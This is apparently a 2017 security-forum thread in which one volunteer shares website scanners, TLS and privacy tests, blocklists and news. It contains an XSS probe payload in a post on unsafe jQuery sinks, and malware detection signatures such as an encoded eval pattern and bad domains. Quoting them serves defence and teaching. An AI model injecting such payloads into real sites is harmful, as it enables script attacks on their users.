https://www.blackhat.com/us-17/briefings/schedule/#firmware-is-the-new-black---analyzing-past-three-years-of-biosuefi-security-vulnerabilities-6924

Probably their management controller was not secure enough, and now they will protect every byte of their propriety code the hard-coded way, so even those with access to it cannot manipulate, so Google may lead and calls the shots always.
Only hope is that every one of these self-made security chips with TMP and secure boot will follow the original blue-print  :D

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2017, 11:53:07 AM
Titan security goes deep. While it even goes deeper than TPM and secure boot.
Doing somewhat more than standard iLO/Drac/BMC are capable of.
So it is additional or rather better.

Reverse engineering this is possible but comes at a price, as Google is google.
Reverse engineering chips can be done and is not outside the capabilities of NSA for instance.
Read: https://www.blackhat.com/docs/us-15/materials/us-15-Thomas-Advanced-IC-Reverse-Engineering-Techniques-In-Depth-Analysis-Of-A-Modern-Smart-Card.pdf
But it certainly is easier when you know all of the masterset and know the design as the innerlining of your pocket,
than when you have to start from scratch with functions of a to that time unknown chip.

So even Google staff with access would have a hard time doing this and it is outside the scope of the normal user/hacker/entity.

Now we can come to understand why Mainland China ousted Google from their infrastructure.
On the other hand we come to understand that for getting some form of high trust security, the going gets narrow and narrower still.
We also have to reckon the larger developer community that does not know about proper security. It is just an inner circle of specially trained TEchnical IT, that knows all the ins and outs or are specially trained for a particular security aspect.

Anyway the coming of the Titan chip tells us that security on the common infrastructure cannot be (fully) trusted.
So when it just says "google" on a container of hardware, it just cannot be trusted,
while the mobo of Johnny's weblike shop could be.

This is one side of the fascistoid Big Big Commerce times we live in, it is Alice in Wonderland revamped over and over,
and while you think you are secure and inside a trusted environment, it asks you to think hard again.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2017, 03:34:22 PM
Adblocking basically do not exist on android.
Read: https://www.theregister.co.uk/2017/08/25/ad_blocking_doesnt_exist_on_mobile/

I use Brave and Disconnect Search and Avast Mobile solutions a great trio.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 31, 2017, 05:15:51 PM
The newer alternative to Duckduckgo DeepSearch coming:

https://deepsearch.tsignal.io/

But for real search results you cannot go without goggle: https://arstechnica.com/information-technology/2017/02/new-aslr-busting-javascript-is-about-to-make-drive-by-exploits-much-nastier/  and then  https://boingboing.net/2017/02/15/researchers-show-they-can-beat.html  and   https://www.vusec.net/projects/anc/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 02, 2017, 08:27:01 PM
Some website security scan proposals:

Test your website whether it has last best policy website security.
Score in procents.  Scan here example : https://en.internet.nl/domain/www.minbermedia.kz/91228/   
a low grade staus 35% website.

Additional DNS scans: https://frag.co.uk/tools/?page=source&host=www2.eu
and http://dnscheck.pingdom.com/?domain=

Word Press resources -> PHP Cross Reference of WordPress Trunk
-> https://wpseek.com/source/wp/latest/nav.html?wp-content/themes/twentyfourteen/functions.php.source.html

then check at: https://hackertarget.com/wordpress-security-scan/

and check later for retirable jQuery code with http://retire.insecurity.today/

finally here: https://observatory.mozilla.org/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2017, 12:25:43 PM
WODC of the Technical University Delft in The Netherlands comes up with
a new methodology to classify threat actors,
based on the motives of such cyberacors.

Cyber researchers are also classified, but as non-actors, not posing a threat.

See added typology...

polonus (volunteer website security analyst and website error-hunter)  (no-actor)
Title: Re: Tests and other Media topics
Post by: polonus on September 05, 2017, 06:58:40 PM
Test website for SSL and the use of latest security techniques:

Re: http://toolbar.netcraft.com/site_report?url=https://voordebuurt.nl
21%  https://en.internet.nl/domain/voordebuurt.nl/92003/

check on certification: https://cryptoreport.websecurity.symantec.com/checker/  &   https://www.digicert.com/help/

See complete results: https://observatory.mozilla.org/analyze.html?host=voordebuurt.nl#third

sub-results: https://www.htbridge.com/ssl/?id=rU3dptL3  &   https://hstspreload.org/?domain=voordebuurt.nl  (failed here)...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2017, 09:57:06 PM
Ransomeware IP trackers:

https://ransomwaretracker.abuse.ch/tracker/

http://vxvault.net/ViriList.php?IP=207.58.143.135

https://www.scumware.org/report/207.58.143.135.html

https://tracker.h3x.eu/download/400  re: https://tracker.h3x.eu/about/400  (with more public tracker lists)

https://github.com/firehol/blocklist-ipsets/blob/master/hphosts_emd.ipset

http://6ca08333.fingerprinted.domains/


enjoy, my good friends, enjoy,


polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2017, 02:13:40 PM
Various best known URL Scan Resources:

Google Safe Browsing Diagnostic   See malware diagnostics: https://transparencyreport.google.com/safe-browsing/search#url=
McAfee Threat Intelligence   Instant lookup http://www.mcafee.com/threat-intelligence/domain/?domain=
McAfee SiteAdvisor   Instant lookup http://www.siteadvisor.com/sites/
Norton Safe Web   Instant lookup https://safeweb.norton.com/report/show?url=
AVG ThreatLabs   Instant lookup http://www.avgthreatlabs.com/sitereports/domain/
SpamHaus Domain Block List   Instant lookup https://www.spamhaus.org/query/dbl?domain=
Web of Trust (WOT)   Instant reputation lookup https://www.mywot.com/en/scorecard/freeflightoffers.com 
(WOT scan resource lost trust once)
Alexa   Website ranking/statistics http://www.alexa.com/siteinfo/
DomainTools   Review domain Whois data http://whois.domaintools.com/ (validation required)
Recommended SecureBrain Gred   Real-time URL/links scan http://check.gred.jp/?url=
Unmask Parasites   Real-time URL quick scan http://www.unmaskparasites.com/security-report/?page=
VirusTotal   Lookup website risk https://www.virustotal.com/en/#url
F-Secure Browsing Protection Lookup website risk    https://www.f-secure.com/pl_PL/welcome
Trend Micro Site Safety Lookup website risk   https://global.sitesafety.trendmicro.com/
URL Void    Lookup website risk http://www.urlvoid.com/
PhishTank   Search website/URL phishing reports http://www.phishtank.com/
ScumWare.org   Search website/URL malware reports http://www.scumware.org/search.scumware
StopBadware.org Clearinghouse   Search website malware reports https://www.stopbadware.org/clearinghouse/search
MalwareURL   Search website malware reports http://www.malwareurl.com/listing-urls.php
urlQuery   Run a real-time scan of a specific URL http://urlquery.net/
Sucuri SiteCheck   Run a real-time scan of a specific URL http://sitecheck.sucuri.net/
Comodo Site Inspector   Run a real-time scan of a specific URL http://siteinspector.comodo.com/
Zscaler Zulu URL Risk Analyzer   Run a real-time scan of a specific URL https://zulu.zscaler.com/
Quttera   Run a real-time scan of a specific URL or website https://www.quttera.com/#online url malware scanner

Enjoy, my good friends, enjoy...
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2017, 08:22:35 PM
A specific Scientology critical resource: https://umbraxenu.no-ip.biz/mediawiki/index.php/Anonymous_and_critic_sites

A good (re)searcher can beat any hacker any time all of the time.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 22, 2017, 12:42:34 PM
How to track url recirects in the browser: https://superuser.com/questions/242138/how-to-track-url-redirects-in-the-browser

and to see where they end up: http://redirectdetective.com/

Enjoy, my good avast friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)

Oh, Firebug Light, nice extension...
Title: Re: Tests and other Media topics
Post by: polonus on September 24, 2017, 03:56:44 PM
JQuery is a sink!

Read: http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html
and https://ttmm.io/tech/jquery-xss/

Understand while polonus continously scans here: http://retire.insecurity.today/  and here: http://www.domxssscanner.com/

A function or method that can be sonsidered as insecure, when one of its arguments comes from untrusted input

(check at https://observatory.mozilla.org/  whether content is being protected properly CORS
- same origine - SRI hashes generated)

and is not correctly being validated according to the layer the function is communicating to.

jQuery.html is a sink and no one so far complains.

jQuery is also designed to perform different operations based on argument type and content.

Using the same interface for query and executing is a "bad idea".

jQuery as selector?

Never use jQuery() or $() with an unvalidated argument. No matter what version is being used. Read the code!

jQuery developers retire old version (zip all for reference). What one acquires, one also should retire!
Change and lock jQuery do-everything behaviour.

Not allow client side into Http encode URI Component. Do not use $.html() with untrusted input.
Check they work as expected <.*\?>
Test your RegExps.
Client Request Proxy is Frameable by design!
unfriendly header added
x-Ms-Origin: http://cyber.at.track.er
XMLHttpRequest.attr=val
IE sees some code as valid JSON you can still be left with an unvalidated object!
Be shy using 3rd party services that produces 3rd party surprises.
HTML Injection Vuln.
Test an' Audit all 3rd party code (jsunpack)
Angular.JS has interesting injections.

Info credits go to stafano di paola of minded security dot com.

jQuery methods that directly update the DOM

.after() same with append, before, htm,l insert After, insert Before, prepend, prependTo, replaceAl,l replaceWith, unWrap, wrap, wrapAll, wrapInner, all like .method() text() updates DOM but is safe.

Do not send unvalidated data to these methods or properly escape before doing so.

More danger from or $danger immedeately evaluates the input e.g. $("<img src =x  onerror = alert(1)>")

jQuery.globalEval()

All event handlers: bind(events), bind (type, [,data], handlers ()], .0n(), add(html).

More research is needed to identify all the safe versus unsafe methods.

polonus (volunteer website security analyst and website error-hunter)

P.S. Interesting interesting read on the dangers of 3rd party scripts:
https://css-tricks.com/potential-dangers-of-third-party-javascript/

and https://hackcabin.com/post/managing-async-dependencies-javascript/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on September 26, 2017, 10:44:20 PM
All you wanna know on javascript: http://exploringjs.com/
The latest developments Async functions: http://exploringjs.com/es2016-es2017/ch_async-functions.html#ch_async-functions

Recent news: https://www.theregister.co.uk/2017/09/26/allen_wirfs_brock_interview/

Security issues: https://docstore.mik.ua/orelly/webprog/jscript/ch21_01.htm  and many, many more...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 04, 2017, 09:25:31 PM
Checking on PHP code -> http://evuln.com/tools/php-security/

Example see attached txt... (this for security reasons, as the security savvy will understand why code as txt file)

polonus

P.S. consider exploits like these: https://www.exploit-db.com/exploits/35743/
Then you like to get such a reaction of the server: "Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.".

D
Title: Re: Tests and other Media topics
Post by: polonus on October 08, 2017, 08:23:33 PM
How to check on blocklist - added this one to uBlock 0 - http://sanyalnet-cloud-vps.freeddns.org/mirai-ips.txt
Checked this IP 1.180.235.36 -> https://www.abuseipdb.com/check/1.180.235.36
reported there 23 times -> also here: https://cleantalk.org/blacklists/1.180.235.36

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 09, 2017, 08:39:11 PM
uBlock Origin found a way against this, but initially this malvertising campaign overcame adblockers:

https://www.technibble.com/forums/threads/malvertising-campaign-finds-a-way-around-ad-blockers.75220/

N.B. Disable "Non Proxied UDP (WebRTC) in your browser!
How to in various browsers: https://whoer.net/blog/article/how-to-disable-webrtc-in-various-browsers/

Check your browser: https://panopticlick.eff.org/

Remember every added extension makes it easier to uniquely make your browser stand out for profiling,
but there actually is no (easy nor hard) way to escape Big Brother to-day...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 10, 2017, 10:09:12 PM
Some resources to check malware sites on.
This website no longer found active, was reported here as with generic malware:

https://otx.alienvault.com/indicator/hostname/www.stocktagfiles.com/

https://www.scumware.org/report/52.48.70.144.html

https://sitecheck.sucuri.net/results/www.stocktagfiles.com

https://www.securityhome.eu/malware/malware.php?mal_id=18398464835769f37b8669a6.43334630

https://minotr.net/detail?md5=1700ed9864bf36f580fd6efbaf1e40b0

https://www.threatcrowd.org/ip.php?ip=52.42.20.109

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 11, 2017, 12:45:53 PM
In firefox we have the beautiful Calomel extension.
But how to check beyond the green padlock inside Google Chrome,
we find the source via Control+Shift+I

How to check certificates under Google Chrome:

1. Go to the website you wanna check the certificate for
2. Push the F12 button
3. Within the window that has opened up, go to the small tab "Security"
4. Click then the button to View Certificate   (info credits go to Vixen).

Later you can check additonally:
https://cryptoreport.websecurity.symantec.com/checker/
and/or https://www.ssllabs.com/ssltest/
and https://www.digicert.com/help/
or here https://threatintelligenceplatform.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 13, 2017, 11:01:41 AM
Where is your Internet connected out?

Where does the cloud take your packets?

See: https://www.peeringdb.com/asn/63949  (example for FOSCAM etc.)

Interesting background read from Chris Baker: https://dyn.com/blog/who-controls-the-internet/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2017, 12:45:45 PM
Actual security related info.

Nonces that eventually aren't real "number onces". Such nonces seems to be a risk.
So time to implement additional security header security and check on https sites for "nonces".

An example of secure nonces we see here for example: https://gcm.tlsfun.de/check.php?host=www.terracotta.org
Quote
Collected 3 GCM nonces from www.terracotta.org

aa0015c9df6c8a46
aa0015c9df6c8a47
aa0015c9df6c8a48

NOT VULNERABLE

This host uses a counter starting with a random value (probably OpenSSL). This is secure.

For a detailed background read our paper: Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS. More supplemental information is in our Github repository.

Enjoy, my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2017, 08:03:28 PM
Certificate transparency for avast webforum according to the netcraft report:

Quote
Certificate transparency   
Signed Certificate Timestamps (SCTs)

Source   Log   Timestamp   Signature Verification
Certificate   Google Pilot
pLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BA=   2015-03-10 16:54:10   Success
Certificate   Google Aviator
aPaY+B9kgr46jO65KB1M/HFRXWeT1ETRCmesu09P+8Q=   2015-03-10 16:54:10   Success
Certificate   DigiCert 1
VhQGmi/XwuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0=   2015-03-10 16:54:10   Success


Verify here: https://www.chromium.org/Home/chromium-security/certificate-transparency

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2017, 02:18:20 PM
In part experimental and results should be taken cum grano salis (with a grain of salt):
mozilla ssh_scan api reults in a dockerized way (all other forms are too abuse-prone, so you risk to become blocked),

Scan a sites privacy score (beta) here: https://privacyscore.org/site/33642/  (as an example we took avast forum site scan).
source code -> https://github.com/mozilla/ssh_scan_api
Avast forum site results as json: https://privacyscore.org/site/33642/json/

3rd party embeds, 3rd party trackers,
4 issues on unreliable encryption - HSTS and HSTS pre-loading not installed, not using Public Key pinning.
No check on mixed content and no check for CSS attempts and ticketbleed (experimental).
No protection found against LOGJAM attacks. More unreliable checks issues...

Another lesson to be learned about optimal website security,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 24, 2017, 11:03:20 PM
Recent research has established that working a feature rich browser will set you out uniquely,
and this means an enhanced privacy risk.

Read: https://today.uic.edu/bloated-browser-functionality-presents-unnecessary-security-privacy-risks 
Info source: Peter Snyder.

You can check the uniqueness of your browser here: https://amiunique.org and https://amiunique.org/fp

If we break up the identifying factors, just a tiny bit of profiling is given off by my browser user agent.
Over 30% comes because of the browser header, that I send to the server.
Another 14% leaks through the way my browser processes decoded content.
A tiny bit of what I give away is through the language(s) I use (Dutch and Polish).
0,22% comes from used plug-ins and that is contradictory to above findings,
but detail of the individual plug-ins speak loudly with over 75% to set me out uniquely against all other browsers.
And do not forget the 33% by the adblocker I use.

Therefore the much liked uBlock Origin adblocker by our forum users,
is still "in it's teens" and needs further development. It will break a lot of sites.

By far the best plug-in that works to the contrary and makes you less unique by heaps is good old "Request Policy",
and here our good forum member, DavidR, was right all the way. You need not convince us any further, DavidR!

Well the use of NoScript or uMatrix is also advisable, allthough not always the unsavvy know what and how to toggle properly.

In these days of dwindling privacy or as Americans say: "Privacy that no longer exists" you have less unique browsers,
one is the Brave browser, developed by the inventor of javascript, without plug-ins and all in the browser
with a one profile for all (except for canvas and other fingerprinting). Brave as browser app a must on android!

On the other site of the scope we have the nonsensical gimmick Browzar browser, I would not recommendate.

Finally to be less outstanding withing the big browser monoculture of Big Blue, firefox and Google's chrome,
I would go for a Japanese browser like Sleipnir as one with this browser has a lesser attack surface on the Western Hemisphere.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: DavidR on October 24, 2017, 11:43:19 PM
Well it was able to tell what virtually every browser gives, which browser and version you are using, your OS and version, plus your language, but that isn't going to get them very far in identifying the user.

EDIT: Whilst this is all well and good, you do have to selectively allow certain sites or you won't see all content.
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2017, 01:24:11 AM
Reported by Lukasz Olejnik this privacy threat: https://blog.lukaszolejnik.com/privacy-of-web-request-api/
Source:  https://www.theregister.co.uk/2017/10/06/another_w3c_api_exposing_users_to_browser_snitching/

Info credits for reporting go to Bitwiper.

A scala of browser privacy scanners: http://www.malwarehelp.org/online_browser_security_and_privacy_scanners.html
like for instance: https://www.leader.ru/secure/who.html  and extended: https://do-know.com/privacy-proxy-test.html?

Even explains I am in a FVEY country - the Netherlands, also extra private internal IPs are given. 2 CPU cores detected.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2017, 05:42:29 PM
L.S.

All hope's not gone - the answer towards a totall loss of privacy
and against centralised snooping on all of your Interwebs interactions =
Decentralised VPN powered by blockchain,
an innovative development, read here: https://mysterium.network/

The clock is solwly ticking the last remnants of your Internet data integrity away,
with Google now also phasing out their public key pinning policy,
who will be making up the logs to check certs transparancy against?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 01, 2017, 04:21:48 PM
Do you consider bitcoin mining on your cycles worse than ads?

Some have it blocked by a good ad-blocker, some with anti-mining extensions.

What are the privacy implications of such a miner?

Flagged as malcode here: https://urlquery.net/report/6c776095-c1f1-4442-afc3-4d297841c802
3 to flag: https://www.virustotal.com/nl/url/b0827282045e14fe7538f204e94e13fe2491f653ed59369e5d8414feeb50e3e7/analysis/1509548406/

Some arnings here, but no tracking: https://privacyscore.org/site/33952/  (No HSTS, 
server is vuln. to Lucky13 and BEASt & DROWn atatcks, no secure client renegotiation set, no security headers set).

F-status and reco mmendations: https://observatory.mozilla.org/analyze.html?host=coinhive.com

No issues on the mining script itself, but overflow to: Results from scanning URL: -https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/184G4bWm-rw.js
Number of sources found: 92
Number of sinks found: 24 -> -static.xx.fbcdn.net/rsrc.php/v3/y2/r/184G4bWm-rw.js benign

polonus (volunteer website security analyst and website error-hunter)

P.S. And when there are blockchains, there could be malware round the corner:
https://securelist.com/tales-from-the-blockchain/82971/

Damian
Title: Re: Tests and other Media topics
Post by: polonus on November 02, 2017, 02:50:15 PM
What are the privacy implications of this webproxy?

Are webproxies that privacy friendly, I think not by necessarily.

http://toolbar.netcraft.com/site_report?url=https://whoer.net
Comes witrh the Cloudflare related insecurities...ssl380088.cloudflaressl.com
Cert. installed correctly: Chain installation:
2 certificates found: RSA and ECC.
No HSTS enabled. SSL/TLS compression: Not Enabled
Heartbeat (extension):  Not Enabled

F-garde status and recommendations: https://observatory.mozilla.org/analyze.html?host=whoer.net

3 vulnerable libraries detected: http://retire.insecurity.today/#!/scan/3ccbbb2afaa1871f0fb292e8931723efc456d0f2132388d83efc464a1ff152ef

No third party cookies -  6 third party requests: http://www.cookiechecker.nl/check-cookies.php?url=https://whoer.net/webproxy

Issues with sources and sinks: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fwhoer.net%2Fwebproxy

Tracker tracker and bug issue report: see attached

Finally the beta privacy score: https://privacyscore.org/site/33961/


polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 07, 2017, 11:52:58 AM
Next to tor, tails and whonix there are different ways to help end-users to protect their last little bits of Internet privacy
with a bit of added anonimity.

Also one looks for new ways like the block chain technology that keeps Bitcoin secure, a decentralised solution against the overpowering intrusion of Big Brother Surveillance State's oversight forces.

A new scheme when the going gets narrow is https://mysterium.network/:

Open Sourced Network allowing anyone to rent their unused Network traffic, while providing a secure connection for those in need.

Hopefully network tld has been properly set to recognize that site's software.
Connection fail here: https://gcm.tlsfun.de/check.php?host=mysterium.network
Connection failed. Host has either no HTTPS or does not support GCM.

See how succesful they are: https://privacyscore.org/site/34025/json/
and https://privacyscore.org/site/34025/  PHP/5.5.9-1ubuntu4.21 with twelve vulnerabilities.

Retirable: http://retire.insecurity.today/#!/scan/c989f46450eddf925f09fc10ca4880608fd09dca1b83216db50cbf3b5373b3ac

Externally Linked Host   Hosting Provider   Country

-news.bitcoin.com   CloudFlare   United States

-bitconnect.co   CloudFlare   United States

-www.cryptocoinsnews.com   CloudFlare   United States

-github.com   GitHub   United States

-techannouncer.com   GoDaddy.com, LLC   United States

-www.linkedin.com   LinkedIn Corporation   United States

-mvp.mysterium.network   DigitalOcean   Netherlands

-goo.gl   Google   United States

-www.sarunas-savickas.com   OOO NPO Relcom   Lithuania

-www.subscribepage.com   CloudFlare   United States

-twitter.com      United States

-www.the-blockchain.com   CJ2 Hosting&Development   Netherlands

-www.digitaljournal.com   Digital Journal, Inc.   United States

-lt.linkedin.com   LinkedIn Corporation   United States

-medium.com   CloudFlare   United States

-cointelegraph.com   CloudFlare   United States

Please, do not fence us in further!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2017, 05:49:07 PM
Just stumbled upon this news:
-> https://gwillem.gitlab.io/2017/11/07/cryptojacking-found-on-2496-stores/

Coinhive cryptominer activity going on on over 2500 hacked Magento webshop websites.
Re: https://twitter.com/gwillem/status/928033303466266626

I hope users stop this by using a decent adblocking or scriptblocking extension or a miner blocker extension.

Willem de Groot added this to his software here: https://github.com/gwillem/magento-malware-scanner/pull/157

One could scan a Magento CMS webshop site also here: https://www.magereport.com/

It would be better when browser developers brought a general broader solution to this problem inside the browser,
so users could be alerted to this abuse and eventually block mining through a site they visit.

As long as this has not been realised, we have to fence for ourselves,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2017, 06:26:57 PM
A attack scenario we could distill from the Coin Hive cryptojacking signatures developed by Willem de Groot comes for Magento webshop sites with amasta.biz vulnerable code. Read: https://support.hypernode.com/knowledgebase/how-to-protect-magento-from-amasty-product-feed-local-file-disclosure/

Rule:
Quote
@@ -648,6 +673,8 @@ ZXZhbChiYXNlNjRfZGVjb2RlK
 aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcv
 account\-mage\.su\/
 air\-frog33\.pw\/
+aleinvest\.xyz\/
+alemoney\.xyz\/
 amasty\.biz\/
 analiticoscdn\.com\/
 animalzz921\.pw\/

Example https://www.magereport.com/scan/?s=+UNDERARMOUR.COM

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2017, 10:40:49 PM
Working the Cipscis - Fallout - Scriptvalidator for errors that not always come up with other methods:

Example code taken from
Quote
line 39 towards line 45 here: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=www.paperkrane.com&ref_sel=GSP2&ua_sel=ff&fs=1

Working out this standard with function tooltips
Quote
  < / sc​ript >
40:  < !-- /all in one seo pack -->
41:  < link rel='stylesheet' id='contact-form-7-css' href='-http://www.paperkrane.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.0.3' type='text/css' media='all' />
42:  < link rel='stylesheet' id='cpsh-shortcodes-css' href='-http://www.paperkrane.com/wp-content/plugins/column-shortcodes/assets/css/shortcodes.css?ver=0.6.6' type='text/css' media='all' />
43:  < link rel='stylesheet' id='blahlab-theme-grid-css' href='-http://www.paperkrane.com/wp-content/themes/paperkrane/assets/stylesheets/standalone/grid.css?ver=4.1.20' type='text/css' media='all' />
44:  < link rel='stylesheet' id='blahlab-external-googlefonts-css' href='-http://fonts.googleapis.com/css?family=Droid+Serif%3A400%2C400italic%7CDroid+Sans&ver=4.1.20' type='text/css' media='all' />
45:  < link rel='stylesheet' id='blahlab-theme-style-css' href='-http://www.paperkrane.com/wp-content/themes/paperkrane/assets/stylesheets/standalone/style.css?ver=4.1.20' type='text/css' media='all' />
  all links inside the validation broken, because of:
https://urlquery.net/report/6380f772-ee76-42f8-99ff-34728fc03f6f  (suspicious code detected).

Always into this because of (in)security aspects of code, because of polonus's interest in voluntarily website security analysis and website error-hunting, and always looking for new angles to come up with,

Damian

P.S.
Quote
A parser-blocking, cross site (i.e. different eTLD+1) script, htxp://www.google-analytics.com/ga.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See https://wXw.chromestatus.com/feature/5718547946799104 for more details.
Courtesy Google Chrome's developer console.
on my Greasemonkey json script - reported
Quote
Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at XMLHttpRequest.xhr.onreadystatechange

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2017, 01:59:09 PM
You could check here whether your browser is vulnerable:  https://mineblock.org/
I get:
Quote
If the miner doesn't start, your browser is safe!
Can't start miner. Your browser is safe!
The baddies are listed here: http://www.badbitcoin.org/thebadlist/

Bad Bitcoin i.m.o.  is a big ponzi-like blockchain scam scheme, like the Black Tulip hype in the days of our Dutch painter Rembrandt, moreover the bitcoin value now halves every three years and over a few decades all present bitcoins will be mined.

When you wanna block mal-ads, you certainly wanna block bad-bitcoin-mining as well,
a good adblocker and scriptblocker combination will keep you safe from bitcoin mining scripts-
uBlockOrigin together with uMatrix.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2017, 10:59:02 PM
Check how privacy (un)friendly is a webproxy:

Beta-testing: https://privacyscore.org/site/34967/

Here we see issues: https://threatintelligenceplatform.com/report/proxy-de1.toolur.com/sCpTixZZn6

Here we found 3 problems: https://mxtoolbox.com/domain/proxy-de1.toolur.com/

F-grade status and recommendations: https://observatory.mozilla.org/analyze.html?host=proxy-de1.toolur.com

polonus (volunteer website security analyst and website error-hunter)

P.S. What strikes us in the results of this proxy website example as insecure, is that the webproxy site does offer https, but does not automatically defaults to it from http!
Secondly it serves up sub-secure ciphers and furthermore the server is vulnerable to Poodle, while also  the nameserver has version info proliferation: 9.9.4-RedHat-9.9.4-51.el7 (so one could check for vuln. and exploits, which attackers could do).
Also a warning goes for undesired redirects!

Damian
Title: Re: Tests and other Media topics
Post by: polonus on November 30, 2017, 10:52:55 PM
Interesting resources on BGP Security and Routing: http://moo.cmcl.cs.cmu.edu/~dwendlan/routing/

Check site example: https://ip.rst.im/dig/internal.akamaistream.net.

Later we found via another check: as21342/moas
Rate - 4.0 ;  2 Router Leaks ; 54 MOAS ; 532 dDos amplifiers

Now that sitevet dot com also as AS bad history resource has disappeared, we have to look out servers not overreach quotes and sources thus disappear for researchers.  ;)

Linkrot is the worst enemy of a volunteer website security analyst and website error-hunter like little old me,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 01, 2017, 11:24:34 PM
Because of recent and present threats to BGP security and the cold cyber-war,
Russia is planning to eventually set up it's own Internet only in BRICS countries.


Read here: https://www.theregister.co.uk/2017/12/01/russia_own_internet/

Here a map of the Root Server Technical Operations Assn: http://www.root-servers.org/

Then the root files: https://www.iana.org/domains/root/files

But there also new innovative solutions like blockstack coming: https://github.com/blockstack/atlas

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 04, 2017, 12:02:47 AM
New Panopticlick scan launched:

 https://www.eff.org/deeplinks/2017/11/panopticlick-30

See: https://panopticlick.eff.org/

Is your browser blocking tracking ads?   ✓ yes
Is your browser blocking invisible trackers?   ✓ yes
Does your blocker stop trackers that are included in the so-called “acceptable ads” whitelist?   ✓ yes
I just changed my profile using the canvas fingerprint extension.

Current canvas noise hash
#14afxxxxxxxxxxxxxxx3244bxx0271
Last changed: December 4 00:01

polonus
Title: Re: Tests and other Media topics
Post by: REDACTED on December 06, 2017, 12:27:46 AM
is your browser block tracking ads? partial protection. Considering my ad blocker is adblock plus, it might be true
is your browser blocking invisible trackers? partial protection. So firefox built in tracking protection is not enough.
Firefox uses disconnect.me tracking list, @_@ i really need a plugin/addon for this huh.
Does your browser stop trackers....acceptable ads. ? no. same answer with my previous one.
Does your browser unblock third parties....Do not track? no. I set my browser to always block third party trackers.
Does your browser protect you from fingerprinting? your browser has a unique fingerprint.

Full result of browser fingerprinting:
screen size is wrong.
no timezone, undefined plugin details
system fonts is wrong, there are fonts missing on the list
user agent: firefox 52, no im using firefox 57
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2017, 05:04:26 PM
Nice new scanner outlay for Cymon - Search Threats.

Example of a randowm IP search result:
https://app.cymon.io/search/ip/209.202.252.95

Enjoy my good friends, enjoy

P.S. Missed completely here: https://www.virustotal.com/#/url/4f5f0accd4fc42fcd4c51851d77c980eaa6f0016aea08de65e3cf3cbb0da9853/detection

Can be combined with these results: https://ransomwaretracker.abuse.ch/ip/209.202.252.95/
and these: https://www.scumware.org/report/209.202.252.95.html

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 11, 2017, 05:18:24 PM
Some signs of computer compromise:

Your AV is disabled and you did not do this yourself.

You get a ransom message and it does not go away after restarting your computer.

You get frequent pop-ups at a time.

Your online passwords do not work anymore and you did not change them.

An unapproved software starts to download suddenly, and you did not allow it to do so.

Your websearches in your browser are redirected.

Your browser suddenly has a new toolbar added.

You are sending spam to friends on social media for instance , and you did not do that yourself.

Your mouse suddenly starts to move all by itself.

Conclusion all could be signs of an infested computer or someone hacking into it.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2017, 10:26:09 PM
Is your server secure against a 19 year old revived crypto attack threat, called by the name of ROBOT?
Background read (facebook has been patched): https://www.theregister.co.uk/2017/12/13/robot_tls_rsa_flaw/

Read: https://robotattack.org/

Check: https://robotattack.org/check/?h=   (h give domain name with www and without).

Test also added here now: https://testssl.sh/

Here: https://github.com/RUB-NDS/TLS-Attacker

Here: https://github.com/tomato42/tlsfuzzer

and here: https://dev.ssllabs.com/

Vulnerable server admins are advised to install available updates or whenever possible disable TLS RSA encryption functionality.

How this could have been kept under the detection radar for that long (19 years) is so far unknown,
but again makes the infrastructure an even more insecure theater.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
